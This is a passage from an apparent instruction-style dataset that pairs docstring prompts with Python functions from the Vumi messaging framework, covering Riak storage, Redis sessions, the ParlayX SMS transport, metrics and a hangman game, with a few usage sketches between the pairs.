[/INST] def _mknode(cls, **kw): + node = cls() + node.lineno = 0 + node.col_offset = 0 + for k, v in kw.items(): + setattr(node, k, v) + return node +[INST] Create a function that has a nice signature and calls out to ``func``.. [/INST] def make_function(name, func, args, vararg=None, kwarg=None, defaults=()): + dflts = [("default_%s" % i, d) for i, d in enumerate(defaults)] + a_args = [_param(a) for a in args] + a_defaults = [_load(k) for k, v in dflts] + c_args = [_load(a) for a in args[:len(args) - len(defaults)]] + c_keywords = [_kw(a) for a in args[len(args) - len(defaults):]] + call = Call(func=_load('func'), args=c_args, keywords=c_keywords, + starargs=(vararg and _load(vararg)), + kwargs=(kwarg and _load(kwarg))) + func_def = FunctionDef( + name=name, args=arguments( + args=a_args, vararg=vararg, kwarg=kwarg, defaults=a_defaults), + body=[Return(value=call)], decorator_list=[]) + locs = {} + globs = dict(globals(), func=func, **dict(dflts)) + eval(compile(Module(body=[func_def]), '', 'exec'), globs, locs) + return locs[name] +[INST] Fetch the next page of results.. [/INST] def next_page(self): + if not self.has_next_page(): + return None + try: + result = self._index_page.next_page() + except RiakError as e: + raise VumiRiakError(e) + return type(self)(result) +[INST] Call a function that touches the network and wrap the result in this +class.. [/INST] def _call_and_wrap(self, func): + return type(self)(func()) +[INST] Create an `SmsMessage` instance from an ElementTree element.. [/INST] def from_element(cls, root): + return cls( + message=gettext(root, 'message'), + sender_address=gettext( + root, 'senderAddress', parse=normalize_address), + service_activation_number=gettext( + root, 'smsServiceActivationNumber', parse=normalize_address), + timestamp=gettext(root, 'dateTime', parse=iso8601.parse_date)) +[INST] Create a `DeliveryInformation` instance from an ElementTree element.. 
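A usage sketch for ``make_function`` above (assumed to be in scope). ``_notify`` is a throwaway target function; the point is that the generated wrapper exposes a real signature rather than ``(*args, **kw)`` while delegating to ``func``:

def _notify(name, greeting):
    return '%s, %s!' % (greeting, name)

notify = make_function('notify', _notify, ['name', 'greeting'],
                       defaults=('hello',))
# notify now has the signature notify(name, greeting='hello')

print(notify('Eve'))                   # hello, Eve!
print(notify('Eve', greeting='hi'))    # hi, Eve!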
[/INST] def from_element(cls, root): + try: + delivery_status = gettext( + root, 'deliveryStatus', parse=DeliveryStatus.lookupByName) + except ValueError, e: + raise ValueError( + 'No such delivery status enumeration value: %r' % (str(e),)) + else: + return cls( + address=gettext(root, 'address', parse=normalize_address), + delivery_status=delivery_status) +[INST] Process a SOAP request and convert any exceptions into SOAP faults.. [/INST] def render_POST(self, request): + def _writeResponse(response): + request.setHeader('Content-Type', 'text/xml; charset="utf-8"') + request.write(tostring(soap_envelope(response))) + request.finish() + def _handleSuccess(result): + request.setResponseCode(http.OK) + return result + def _handleError(f): + log.err(f, 'Failure processing SOAP request') + request.setResponseCode(http.INTERNAL_SERVER_ERROR) + faultcode = u'soapenv:Server' + if f.check(SoapFault): + return f.value.to_element() + return soap_fault(faultcode, f.getErrorMessage()) + try: + tree = parse_document(request.content) + body, header = unwrap_soap_envelope(tree) + except: + d = fail() + else: + d = maybeDeferred(self.process, request, body, header) + d.addCallback(_handleSuccess) + d.addErrback(_handleError) + d.addCallback(_writeResponse) + return NOT_DONE_YET +[INST] Process a received text message.. [/INST] def process_notifySmsReception(self, root, header, name): + linkid = None + if header is not None: + linkid = gettext(header, './/' + str(PARLAYX_COMMON_NS.linkid)) + correlator = gettext(root, NOTIFICATION_NS.correlator) + message = SmsMessage.from_element( + elemfind(root, NOTIFICATION_NS.message)) + d = maybeDeferred( + self.callback_message_received, correlator, linkid, message) + d.addCallback( + lambda ignored: NOTIFICATION_NS.notifySmsReceptionResponse()) + return d +[INST] Process a text message delivery receipt.. [/INST] def process_notifySmsDeliveryReceipt(self, root, header, name): + correlator = gettext(root, NOTIFICATION_NS.correlator) + delivery_info = DeliveryInformation.from_element( + elemfind(root, NOTIFICATION_NS.deliveryStatus)) + d = maybeDeferred(self.callback_message_delivered, + correlator, delivery_info.delivery_status.value) + d.addCallback( + lambda ignored: NOTIFICATION_NS.notifySmsDeliveryReceiptResponse()) + return d +[INST] Periodically clean out old buckets and calculate aggregates.. [/INST] def check_buckets(self): + current_ts_key = self._ts_key(self._time() - self.lag) - 1 + for ts_key in self.buckets.keys(): + if ts_key <= self._last_ts_key: + log.err(DiscardedMetricError("Throwing way old metric data: %r" + % self.buckets[ts_key])) + del self.buckets[ts_key] + elif ts_key <= current_ts_key: + aggregates = [] + ts = ts_key * self.bucket_size + items = self.buckets[ts_key].iteritems() + for metric_name, (agg_set, values) in items: + values = [v for t, v in sorted(values)] + for agg_name in agg_set: + agg_metric = "%s.%s" % (metric_name, agg_name) + agg_func = Aggregator.from_name(agg_name) + agg_value = agg_func(values) + aggregates.append((agg_metric, agg_value)) + for agg_metric, agg_value in aggregates: + self.publisher.publish_aggregate(agg_metric, ts, + agg_value) + del self.buckets[ts_key] + self._last_ts_key = current_ts_key +[INST] Builds a request URL with the appropriate params.. 
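A by-hand illustration of what one ``check_buckets`` pass publishes for a single metric, assuming a 60-second bucket size and an aggregate set of ``('avg', 'max')``. The bucket layout and aggregator names are inferred from the code above, not from separate documentation:

bucket_size = 60
bucket = {
    'smpp.outbound': (
        ('avg', 'max'),
        [(1400000005, 2.0), (1400000020, 4.0), (1400000047, 6.0)],
    ),
}
ts_key = 1400000005 // bucket_size   # all three datapoints share this bucket
ts = ts_key * bucket_size            # timestamp attached to the aggregates

values = [v for t, v in sorted(bucket['smpp.outbound'][1])]
published = [
    ('smpp.outbound.avg', ts, sum(values) / len(values)),   # 4.0
    ('smpp.outbound.max', ts, max(values)),                 # 6.0
]
print(published)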
[/INST] def make_request(self, path, qparams): + args = { + 'messageid': TransportMessage.generate_id(), + 'time': self.today.strftime('%Y.%m.%d %H:%M:%S'), + 'sender': '0041791234567', + 'destination': '9292', + 'provider': 'provider', + 'keyword': '', + 'header': '', + 'text': '', + 'keyword': '', + } + args.update(qparams) + url = self.transport_url + path + return http_request_full(url, urlencode(args), { + 'Content-Type': ['application/x-www-form-urlencoded'], + }) +[INST] Invoke the canned response for the method name ``name`` and log the +invocation.. [/INST] def _invoke_response(self, name, args): + self.calls.append((name, args)) + return self.responses[name]() +[INST] Find or create a hangman game for this player. +Then process the user's message.. [/INST] def consume_user_message(self, msg): + content = msg['content'].encode('utf-8') if msg['content'] else None + log.msg("User message: %s" % content) + text = msg['content'] + if text is None: + reply = self.get_help() + else: + reply = self.process_message(text) + return self.reply_to(msg, reply) +[INST] Copy dynamic field values from old data to new data.. [/INST] def copy_dynamic_values(self, *dynamic_prefixes): + for prefix in dynamic_prefixes: + for key in self.old_data: + if key.startswith(prefix): + self.new_data[key] = self.old_data[key] +[INST] Add a new index value to new data.. [/INST] def add_index(self, index, value): + if index is None: + index = '' + else: + index = str(index) + if isinstance(value, unicode): + value = value.encode('utf-8') + self.new_index.setdefault(index, []).append(value) +[INST] Called when a field value changes.. [/INST] def _field_changed(self, changed_field_name): + already_notifying = bool(self._fields_changed) + if changed_field_name not in self._fields_changed: + self._fields_changed.append(changed_field_name) + if not already_notifying: + self._notify_fields_changed() +[INST] Save the object to Riak.. [/INST] def save(self): + return self.manager.store(self) +[INST] Delete the object from Riak.. [/INST] def delete(self): + return self.manager.delete(self) +[INST] Load an object from Riak.. [/INST] def load(cls, manager, key, result=None): + return manager.load(cls, key, result=result) +[INST] Load batches of objects for the given list of keys.. [/INST] def load_all_bunches(cls, manager, keys): + return manager.load_all_bunches(cls, keys) +[INST] Find object keys by index.. [/INST] def index_keys(cls, manager, field_name, value, end_value=None, + return_terms=None): + index_name, start_value, end_value = index_vals_for_field( + cls, field_name, value, end_value) + return manager.index_keys( + cls, index_name, start_value, end_value, return_terms=return_terms) +[INST] Find object keys by index, using pagination.. [/INST] def index_keys_page(cls, manager, field_name, value, end_value=None, + return_terms=None, max_results=None, + continuation=None): + index_name, start_value, end_value = index_vals_for_field( + cls, field_name, value, end_value) + return manager.index_keys_page( + cls, index_name, start_value, end_value, return_terms=return_terms, + max_results=max_results, continuation=continuation) +[INST] Finds objects in the index that match the regex patterns in query. [/INST] def index_match(cls, manager, query, field_name, value): + return manager.mr_from_field_match(cls, query, field_name, value) +[INST] Search for instances of this model matching keys/values.. 
[/INST] def search(cls, manager, **kw): + for k, value in kw.iteritems(): + value = unicode(value) + value = value.replace('\\', '\\\\') + value = value.replace("'", "\\'") + kw[k] = value + query = " AND ".join("%s:'%s'" % (k, v) for k, v in kw.iteritems()) + return cls.raw_search(manager, query) +[INST] Performs a raw riak search, does no inspection on the given query.. [/INST] def raw_search(cls, manager, query): + return manager.mr_from_search(cls, query) +[INST] Performs a real riak search, does no inspection on the given query.. [/INST] def real_search(cls, manager, query, rows=None, start=None): + return manager.real_search(cls, query, rows=rows, start=start) +[INST] Do a regex OR search across the keys found in a secondary index.. [/INST] def from_index_match(cls, mgr, model, query, index_name, start_value, + end_value=None): + mr = mgr.riak_map_reduce().index( + mgr.bucket_name(model), index_name, start_value, end_value).map( + """ + function(value, keyData, arg) { + /* + skip deleted values, might show up during a test + */ + var values = value.values.filter(function(val) { + return !val.metadata['X-Riak-Deleted']; + }); + if(values.length) { + var data = JSON.parse(values[0].data); + for (j in arg) { + var query = arg[j]; + var content = data[query.key]; + var regex = RegExp(query.pattern, query.flags) + if(content && regex.test(content)) { + return [value.key]; + } + } + } + return []; + } + """, { + 'arg': query, + }) + return cls(mgr, mr) +[INST] Construct a manager from a dictionary of options.. [/INST] def from_config(cls, config): + raise NotImplementedError("Sub-classes of Manager should implement" + " .from_config(...)") +[INST] Close the client underlying this manager instance, if necessary.. [/INST] def close_manager(self): + raise NotImplementedError("Sub-classes of Manager should implement" + " .close_manager(...)") +[INST] Load a model instance for the key from Riak. +If the key doesn't exist, this method should return None +instead of an instance of cls.. [/INST] def load(self, cls, key, result=None): + raise NotImplementedError("Sub-classes of Manager should implement" + " .load(...)") +[INST] Migrate a loaded riak_object to the latest schema version. +NOTE: This should only be called by subclasses.. [/INST] def _migrate_riak_object(self, modelcls, key, riak_object): + was_migrated = False + while riak_object.get_data() is not None: + data_version = riak_object.get_data().get('$VERSION', None) + if data_version == modelcls.VERSION: + obj = modelcls(self, key, _riak_object=riak_object) + obj.was_migrated = was_migrated + return obj + migrator = modelcls.MIGRATOR(modelcls, self, data_version) + riak_object = migrator(riak_object).get_riak_object() + was_migrated = True + return None +[INST] Migrate a riak_object to the required schema version before storing. +NOTE: This should only be called by subclasses.. [/INST] def _reverse_migrate_riak_object(self, modelobj): + riak_object = modelobj._riak_object + modelcls = type(modelobj) + model_name = "%s.%s" % (modelcls.__module__, modelcls.__name__) + store_version = self.store_versions.get(model_name, modelcls.VERSION) + data_version = riak_object.get_data().get('$VERSION', None) + while data_version != store_version: + migrator = modelcls.MIGRATOR( + modelcls, self, data_version, reverse=True) + riak_object = migrator(riak_object).get_riak_object() + data_version = riak_object.get_data().get('$VERSION', None) + return riak_object +[INST] Load the model instances for a batch of keys from Riak. 
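The escaping in ``search`` above is easiest to see on concrete values. ``build_query`` below is a stripped-down copy of just the string handling (no Riak involved), showing the query string that would be handed to ``raw_search``:

def build_query(**kw):
    for k, value in kw.iteritems():
        value = unicode(value)
        value = value.replace('\\', '\\\\')
        value = value.replace("'", "\\'")
        kw[k] = value
    return " AND ".join("%s:'%s'" % (k, v) for k, v in kw.iteritems())

print(build_query(surname=u"O'Brien"))
# surname:'O\'Brien'
print(build_query(path=u"C:\\tmp"))
# path:'C:\\tmp'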
+If a key doesn't exist, no object will be returned for it.. [/INST] def _load_multiple(self, cls, keys): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._load_multiple(...)") +[INST] Load the model instances for a batch of keys from Riak. +If a key doesn't exist, no object will be returned for it.. [/INST] def _load_bunch_mapreduce(self, model, keys): + mr = self.mr_from_keys(model, keys) + mr._riak_mapreduce_obj.map(function=""" + function (v) { + values = v.values.filter(function(val) { + return !val.metadata['X-Riak-Deleted']; + }) + if (!values.length) { + return []; + } + return [[v.key, values[0]]] + } + """).filter_not_found() + return self.run_map_reduce( + mr._riak_mapreduce_obj, lambda mgr, obj: model.load(mgr, *obj)) +[INST] Load the model instances for a batch of keys from Riak. +If a key doesn't exist, no object will be returned for it.. [/INST] def _load_bunch(self, model, keys): + assert len(keys) <= self.load_bunch_size + if not keys: + return [] + if self.USE_MAPREDUCE_BUNCH_LOADING: + return self._load_bunch_mapreduce(model, keys) + else: + return self._load_multiple(model, keys) +[INST] Load batches of model instances for a list of keys from Riak.. [/INST] def load_all_bunches(self, model, keys): + while keys: + batch_keys = keys[:self.load_bunch_size] + keys = keys[self.load_bunch_size:] + yield self._load_bunch(model, batch_keys) +[INST] Run a map reduce instance and return the results mapped to +objects by the map_function.. [/INST] def run_map_reduce(self, mapreduce, mapper_func=None, reducer_func=None): + raise NotImplementedError("Sub-classes of Manager should implement" + " .run_map_reduce(...)") +[INST] Delete *ALL* keys in buckets whose names start buckets with +this manager's bucket prefix. + +Use only in tests.. [/INST] def purge_all(self): + raise NotImplementedError("Sub-classes of Manager should implement" + " .purge_all()") +[INST] Create a worker factory, connect to AMQP and return the factory. +Return value is the AmqpFactory instance containing the worker.. [/INST] def create_worker(self, worker_class, config, timeout=30, + bindAddress=None): + return self.create_worker_by_class( + load_class_by_string(worker_class), config, timeout=timeout, + bindAddress=bindAddress) +[INST] Return a list of active user_ids and associated sessions. Loops over +known active_sessions, some of which might have auto expired. +Implements lazy garbage collection, for each entry it checks if +the user's session still exists, if not it is removed from the set.. [/INST] def active_sessions(self): + skey = self.r_key('active_sessions') + sessions_to_expire = [] + for user_id in self.r_server.smembers(skey): + ukey = self.r_key('session', user_id) + if self.r_server.exists(ukey): + yield user_id, self.load_session(user_id) + else: + sessions_to_expire.append(user_id) + for user_ids in sessions_to_expire: + self.r_server.srem(skey, user_id) +[INST] Generate a keyname using this workers prefix. [/INST] def r_key(self, *args): + parts = [self.r_prefix] + parts.extend(args) + return ":".join(parts) +[INST] Schedule a session to timeout +Parameters + +user_id : str +The user's id. +timeout : int +The number of seconds after which this session should expire. [/INST] def schedule_session_expiry(self, user_id, timeout): + ukey = self.r_key('session', user_id) + self.r_server.expire(ukey, timeout) +[INST] Create a new session using the given user_id. 
[/INST] def create_session(self, user_id, **kwargs): + defaults = { + 'created_at': time.time() + } + defaults.update(kwargs) + self.save_session(user_id, defaults) + if self.max_session_length: + self.schedule_session_expiry(user_id, self.max_session_length) + return self.load_session(user_id) +[INST] Save a session +Parameters + +user_id : str +The user's id. +session : dict +The session info, nested dictionaries are not supported. Any +values that are dictionaries are converted to strings by Redis.. [/INST] def save_session(self, user_id, session): + ukey = self.r_key('session', user_id) + for s_key, s_value in session.items(): + self.r_server.hset(ukey, s_key, s_value) + skey = self.r_key('active_sessions') + self.r_server.sadd(skey, user_id) + return session +[INST] Construct a unique scheduled key.. [/INST] def scheduled_key(self): + timestamp = datetime.utcnow() + unique_id = uuid4().get_hex() + timestamp = timestamp.isoformat().split('.')[0] + return self.r_key(".".join(("scheduled", timestamp, unique_id))) +[INST] Return a list of active user_ids and associated sessions. +Queries redis for keys starting with the session key prefix. This is +O(n) over the total number of keys in redis, but this is still pretty +quick even for millions of keys. Try not to hit this too often, though.. [/INST] def active_sessions(self): + keys = yield self.redis.keys('session:*') + sessions = [] + for user_id in [key.split(':', 1)[1] for key in keys]: + sessions.append((user_id, (yield self.load_session(user_id)))) + returnValue(sessions) +[INST] Schedule a session to timeout +Parameters + +user_id : str +The user's id. +timeout : int +The number of seconds after which this session should expire. [/INST] def schedule_session_expiry(self, user_id, timeout): + ukey = "%s:%s" % ('session', user_id) + return self.redis.expire(ukey, timeout) +[INST] Create a new session using the given user_id. [/INST] def create_session(self, user_id, **kwargs): + yield self.clear_session(user_id) + defaults = { + 'created_at': time.time() + } + defaults.update(kwargs) + yield self.save_session(user_id, defaults) + if self.max_session_length: + yield self.schedule_session_expiry(user_id, + int(self.max_session_length)) + returnValue((yield self.load_session(user_id))) +[INST] Save a session +Parameters + +user_id : str +The user's id. +session : dict +The session info, nested dictionaries are not supported. Any +values that are dictionaries are converted to strings by Redis.. [/INST] def save_session(self, user_id, session): + ukey = "%s:%s" % ('session', user_id) + for s_key, s_value in session.items(): + yield self.redis.hset(ukey, s_key, s_value) + returnValue(session) +[INST] Application-specific config validation happens in here. +Subclasses may override this method to perform extra config +validation.. [/INST] def validate_config(self): + pass +[INST] Create an ElementTree element. +The element tag name will be this qualified name's +`QualifiedName.text` value.. [/INST] def element(self, *children, **attrib): + return Element(self.text, *children, **attrib) +[INST] Add children to an element.. [/INST] def _add_children(self, elem, children): + for child in children: + self._handle_child(elem, child) +[INST] Set XML attributes on an element.. [/INST] def _set_attributes(self, elem, attrib): + for k, v in attrib.items(): + elem.set(k, v) +[INST] Add text content to an element.. 
[/INST] def _add_text(self, elem, text): + if len(elem): + elem[-1] = (elem[-1].tail or '') + text + else: + elem.text = (elem.text or '') + text +[INST] Add a child element to a parent element. +Child elements can be any of the following.. [/INST] def _handle_child(self, parent, child): + if callable(child): + child = child() + t = self._typemap.get(type(child)) + if t is None: + if etree.iselement(child): + parent.append(child) + return + raise TypeError('Unknown child type: %r' % (child,)) + v = t(parent, child) + if v is not None: + self._handle_child(parent, v) +[INST] Split a fully qualified element name, in Clark's notation, into its URI and +local name components.. [/INST] def split_qualified(fqname): + if fqname and fqname[0] == '{': + return tuple(fqname[1:].split('}')) + return None, fqname +[INST] Convert an ElementTree element into a dictionary structure. +Text content is stored against a special key, ``#text``, unless the element +contains only text and no attributes. + +Attributes are converted into dictionaries of the attribute name, prefixed +with ``@``, keyed against the attribute value, which are keyed against the +root element's name. + +Child elements are recursively turned into dictionaries. Child elements +with the same name are coalesced into a ``list``.. [/INST] def element_to_dict(root): + d = {root.tag: {} if root.attrib else None} + children = root.getchildren() + if children: + dd = defaultdict(list) + for child_dict in map(element_to_dict, children): + for k, v in child_dict.iteritems(): + dd[k].append(v) + d = {root.tag: dict((k, v[0] if len(v) == 1 else v) + for k, v in dd.iteritems())} + if root.attrib: + d[root.tag].update( + ('@' + str(k), v) for k, v in root.attrib.iteritems()) + if root.text: + text = root.text.strip() + if children or root.attrib: + if text: + d[root.tag]['#text'] = text + else: + d[root.tag] = text + return d +[INST] Clean-up of setup done in setup_transport should happen here.. [/INST] def teardown_transport(self): + pass +[INST] Publish a :class:`TransportUserMessage` message. +Some default parameters are handled, so subclasses don't have +to provide a lot of boilerplate.. [/INST] def publish_message(self, **kw): + kw.setdefault('transport_name', self.transport_name) + kw.setdefault('transport_metadata', {}) + msg = TransportUserMessage(**kw) + return self.connectors[self.transport_name].publish_inbound(msg) +[INST] Publish a :class:`TransportEvent` message. +Some default parameters are handled, so subclasses don't have +to provide a lot of boilerplate.. [/INST] def publish_event(self, **kw): + kw.setdefault('transport_name', self.transport_name) + kw.setdefault('transport_metadata', {}) + event = TransportEvent(**kw) + return self.connectors[self.transport_name].publish_event(event) +[INST] Helper method for publishing a status message.. [/INST] def publish_status(self, **kw): + msg = TransportStatus(**kw) + if self._should_publish_status: + conn = self.connectors[self.status_connector_name] + return conn.publish_status(msg) + else: + self.log.debug( + 'Status publishing disabled for transport %r, ignoring ' + 'status %r' % (self.transport_name, msg)) + return succeed(msg) +[INST] This must be overridden to read outbound messages and do the right +thing with them.. [/INST] def handle_outbound_message(self, message): + raise NotImplementedError() +[INST] Emulate an inbound message from SMSSync on an Android phone.. 
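A worked example of ``element_to_dict`` above (assumed to be in scope), showing the ``@attribute`` prefix, coalescing of repeated children into a list, and a text-only leaf; key order in the printed result may differ:

from xml.etree.ElementTree import fromstring

xml = (
    '<msg id="42">'
    '<to>+27831112222</to>'
    '<to>+27833334444</to>'
    '<body>hello</body>'
    '</msg>'
)
print(element_to_dict(fromstring(xml)))
# {'msg': {'@id': '42',
#          'to': ['+27831112222', '+27833334444'],
#          'body': 'hello'}}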
[/INST] def smssync_inbound(self, content, from_addr='123', to_addr='555', + timestamp=None, message_id='1', secret=None): + msginfo = self.default_msginfo() + if timestamp is None: + timestamp = datetime.datetime.utcnow() + if hasattr(timestamp, 'strftime'): + timestamp = timestamp.strftime("%m-%d-%y %H:%M") + if secret is None: + secret = msginfo.smssync_secret + params = { + 'sent_to': to_addr, + 'from': from_addr, + 'message': content, + 'sent_timestamp': timestamp, + 'message_id': message_id, + 'secret': secret, + } + return self.smssync_call(params, method='POST') +[INST] Return the game state as a dict.. [/INST] def state(self): + return { + 'guesses': u"".join(sorted(self.guesses)), + 'word': self.word, + 'msg': self.msg, + } +[INST] Handle an user input string. +Parameters + +message : unicode +Message received from user.. [/INST] def event(self, message): + message = message.lower() + if not message: + self.msg = u"Some input required please." + elif len(message) > 1: + self.msg = u"Single characters only please." + elif message == '0': + self.exit_code = self.DONE + self.msg = u"Game ended." + elif self.won(): + self.exit_code = self.DONE_WANTS_NEW + elif message not in string.lowercase: + self.msg = u"Letters of the alphabet only please." + elif message in self.guesses: + self.msg = u"You've already guessed '%s'." % (message,) + else: + assert len(message) == 1 + self.guesses.add(message) + log.msg("Message: %r, word: %r" % (message, self.word)) + if message in self.word: + self.msg = u"Word contains at least one '%s'! :D" % (message,) + else: + self.msg = u"Word contains no '%s'. :(" % (message,) + if self.won(): + self.msg = self.victory_message() +[INST] Fetch a game for the given user ID.. [/INST] def load_game(self, msisdn): + game_key = self.game_key(msisdn) + state = yield self.session_manager.load_session(game_key) + if state: + game = HangmanGame.from_state(state) + else: + game = None + returnValue(game) +[INST] Create a new game for the given user ID.. [/INST] def new_game(self, msisdn, random_word_url): + word = yield self.random_word(random_word_url) + word = word.strip().lower() + game = HangmanGame(word) + game_key = self.game_key(msisdn) + yield self.session_manager.create_session(game_key, **game.state()) + returnValue(game) +[INST] Save the game state for the given game.. [/INST] def save_game(self, msisdn, game): + game_key = self.game_key(msisdn) + state = game.state() + return self.session_manager.save_session(game_key, state) +[INST] Find or create a hangman game for this player. +Then process the user's message.. [/INST] def consume_user_message(self, msg): + log.msg("User message: %s" % msg['content']) + user_id = msg.user() + config = yield self.get_config(msg) + game = yield self.load_game(user_id) + if game is None: + game = yield self.new_game(user_id, config.random_word_url) + if msg['content'] is None: + self.reply_to(msg, game.draw_board(), True) + return + message = msg['content'].strip() + game.event(message) + continue_session = True + if game.exit_code == game.DONE: + yield self.delete_game(user_id) + continue_session = False + elif game.exit_code == game.DONE_WANTS_NEW: + game = yield self.new_game(user_id, config.random_word_url) + else: + yield self.save_game(user_id, game) + self.reply_to(msg, game.draw_board(), continue_session) +[INST] Start the metric polling and publishing task.. 
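The form fields an Android SMSSync client POSTs to the transport, as emulated by ``smssync_inbound`` above. The URL wiring is omitted and the secret is a placeholder; note the ``%m-%d-%y %H:%M`` timestamp format:

import datetime
from urllib import urlencode   # Python 2, matching the rest of this code

params = {
    'sent_to': '555',
    'from': '+27831234567',
    'message': 'Hello SMSSync',
    'sent_timestamp': datetime.datetime.utcnow().strftime('%m-%d-%y %H:%M'),
    'message_id': '1',
    'secret': 'topsecret',
}
body = urlencode(params)
# POSTed with Content-Type application/x-www-form-urlencoded, e.g.:
# sent_to=555&from=%2B27831234567&message=Hello+SMSSync&...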
[/INST] def start_polling(self): + self._task = LoopingCall(self.publish_metrics) + done = self._task.start(self._publish_interval, now=False) + done.addErrback(lambda failure: log.err(failure, + "MetricManager polling task died")) +[INST] Stop the metric polling and publishing task.. [/INST] def stop_polling(self): + if self._task: + if self._task.running: + self._task.stop() + self._task = None +[INST] Publish a single value for the given metric.. [/INST] def oneshot(self, metric, value): + self._oneshot_msgs.append( + (metric, [(int(time.time()), value)])) +[INST] Register a new metric object to be managed by this metric set. +A metric can be registered with only one metric set.. [/INST] def register(self, metric): + metric.manage(self) + self._metrics.append(metric) + if metric.name in self._metrics_lookup: + raise MetricRegistrationError("Duplicate metric name %s" + % metric.name) + self._metrics_lookup[metric.name] = metric + return metric +[INST] Start publishing metrics in a loop.. [/INST] def start(self, channel): + if self._publisher is not None: + raise RuntimeError("Publisher already present.") + self._publisher = MetricPublisher() + self._publisher.start(channel) + self.start_polling() +[INST] Called by :class:`MetricManager` when this metric is registered.. [/INST] def manage(self, manager): + if self._manager is not None: + raise MetricRegistrationError( + "Metric %s already registered with MetricManager with" + " prefix %s." % (self.name, self._manager.prefix)) + self._manager = manager +[INST] Raise an exception if closed, otherwise return underlying client.. [/INST] def _client(self): + if self._closed: + raise VumiRiakError("Can't use closed Riak client.") + return self._raw_client +[INST] Purge all objects and buckets properties belonging to buckets with the +given prefix. + +This operation should *ONLY* be used in tests.. [/INST] def _purge_all(self, bucket_prefix): + buckets = self._raw_client.get_buckets() + for bucket in buckets: + if bucket.name.startswith(bucket_prefix): + for key in bucket.get_keys(): + obj = bucket.get(key) + obj.delete() + bucket.clear_properties() + if self._closed: + self.close() +[INST] Call a function that touches the network and wrap the result in this +class.. [/INST] def _call_and_wrap(self, func): + raise NotImplementedError("Subclasses must implement this.") +[INST] Migrate keys from `keys_list` until there are none left. +This method is expected to be called multiple times concurrently with +all instances sharing the same `keys_list`.. [/INST] def migrate_keys(self, _result, keys_list, dry_run): + while keys_list: + key = keys_list.pop(0) + yield self.migrate_key(key, dry_run) +[INST] Perform an index query to get all keys and migrate them. +If `continuation` is provided, it will be used as the starting point +for the query.. [/INST] def migrate_all_keys(self, continuation=None): + self.emit("Migrating ...") + emit_progress = lambda t: self.emit( + "%s object%s migrated." % (t, "" if t == 1 else "s")) + index_page = yield self.model.all_keys_page( + max_results=self.options["index-page-size"], + continuation=continuation) + yield self.migrate_pages(index_page, emit_progress) +[INST] Acquire a tag from the pool (returns None if no tags are avaliable).. [/INST] def jsonrpc_acquire_tag(self, pool, owner=None, reason=None): + d = self.tagpool.acquire_tag(pool, owner, reason) + return d +[INST] Acquire the specific tag (returns None if the tag is unavailable).. 
[/INST] def jsonrpc_acquire_specific_tag(self, tag, owner=None, reason=None): + d = self.tagpool.acquire_specific_tag(tag, owner, reason) + return d +[INST] Delete the given pool and all associated metadata and tags. +No tags from the pool may be in use.. [/INST] def jsonrpc_purge_pool(self, pool): + return self.tagpool.purge_pool(pool) +[INST] Return a list of all available pools.. [/INST] def jsonrpc_list_pools(self): + d = self.tagpool.list_pools() + d.addCallback(list) + return d +[INST] Returns the owner of an acquired tag and why it was acquired.. [/INST] def jsonrpc_acquired_by(self, tag): + d = self.tagpool.acquired_by(tag) + d.addCallback(list) + return d +[INST] Encode a unicode_string in a specific encoding and return +the byte string.. [/INST] def encode(unicode_string, encoding, errors): + raise NotImplementedError(".encode() method not implemented.") +[INST] Decode a bytestring in a specific encoding and return the +unicode string. [/INST] def decode(byte_string, encoding, errors): + raise NotImplementedError(".decode() method not implemented.") +[INST] Create a `ParlayXClient` instance.. [/INST] def _create_client(self, config): + return ParlayXClient( + service_provider_service_id=config.service_provider_service_id, + service_provider_id=config.service_provider_id, + service_provider_password=config.service_provider_password, + short_code=config.short_code, + endpoint=config.notification_endpoint_uri, + send_uri=config.remote_send_uri, + notification_uri=config.remote_notification_uri) +[INST] Send a text message via the ParlayX client.. [/INST] def handle_outbound_message(self, message): + log.info('Sending SMS via ParlayX: %r' % (message.to_json(),)) + transport_metadata = message.get('transport_metadata', {}) + d = self._parlayx_client.send_sms( + message['to_addr'], + message['content'], + unique_correlator(message['message_id']), + transport_metadata.get('linkid')) + d.addErrback(self.handle_outbound_message_failure, message) + d.addCallback( + lambda requestIdentifier: self.publish_ack( + message['message_id'], requestIdentifier)) + return d +[INST] Handle incoming text messages from `SmsNotificationService` callbacks.. [/INST] def handle_raw_inbound_message(self, correlator, linkid, inbound_message): + log.info('Receiving SMS via ParlayX: %r: %r' % ( + correlator, inbound_message,)) + message_id = extract_message_id(correlator) + return self.publish_message( + message_id=message_id, + content=inbound_message.message, + to_addr=inbound_message.service_activation_number, + from_addr=inbound_message.sender_address, + provider='parlayx', + transport_type=self.transport_type, + transport_metadata=dict(linkid=linkid)) +[INST] Construct a unique message identifier from an existing message +identifier. + +This is necessary for the cases where a ``TransportMessage`` needs to +be transmitted, since ParlayX wants unique identifiers for all sent +messages.. [/INST] def unique_correlator(message_id, _uuid=None): + if _uuid is None: + _uuid = uuid.uuid4() + return '%s:%s' % (message_id, _uuid) +[INST] Extract the Vumi message identifier from a ParlayX correlator.. [/INST] def extract_message_id(correlator): + return correlator.split(':', 1)[0] +[INST] Creates a dummy Vas2Nets request for testing our resources with. [/INST] def create_request(params={}, path='/', method='POST'): + request = DummyRequest(path) + request.method = method + request.args = params + return request +[INST] Create and store an outbound message.. 
[/INST] def _create_outbound(self, tag=("pool", "tag"), by_batch=False, + content='outbound foo'): + add_kw, batch_id = yield self._maybe_batch(tag, by_batch) + msg = self.msg_helper.make_outbound(content) + msg_id = msg['message_id'] + yield self.store.add_outbound_message(msg, **add_kw) + returnValue((msg_id, msg, batch_id)) +[INST] Create and store an inbound message.. [/INST] def _create_inbound(self, tag=("pool", "tag"), by_batch=False, + content='inbound foo'): + add_kw, batch_id = yield self._maybe_batch(tag, by_batch) + msg = self.msg_helper.make_inbound( + content, to_addr="+1234567810001", transport_type="sms") + msg_id = msg['message_id'] + yield self.store.add_inbound_message(msg, **add_kw) + returnValue((msg_id, msg, batch_id)) +[INST] Format a normalized MSISDN as a URI that ParlayX will accept.. [/INST] def format_address(msisdn): + if not msisdn.startswith('+'): + raise ValueError('Only international format addresses are supported') + return 'tel:' + msisdn[1:] +[INST] Format a `datetime` instance timestamp according to ParlayX +requirements.. [/INST] def format_timestamp(when): + return when.strftime('%Y%m%d%H%M%S') +[INST] Build a time-sensitive password for a request.. [/INST] def make_password(service_provider_id, service_provider_password, + timestamp): + return hashlib.md5( + service_provider_id + + service_provider_password + + timestamp).hexdigest() +[INST] The current date and time.. [/INST] def _now(self): + return datetime.now() +[INST] Register a notification delivery endpoint with the remote ParlayX +service.. 